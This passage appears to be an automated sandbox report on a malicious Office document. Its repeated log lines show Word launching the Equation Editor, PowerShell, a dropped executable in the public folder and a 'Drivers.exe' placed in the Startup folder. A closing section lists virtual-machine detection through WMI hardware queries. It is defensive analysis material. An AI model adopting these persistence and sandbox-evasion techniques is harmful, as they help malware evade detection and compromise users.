                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\69577.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
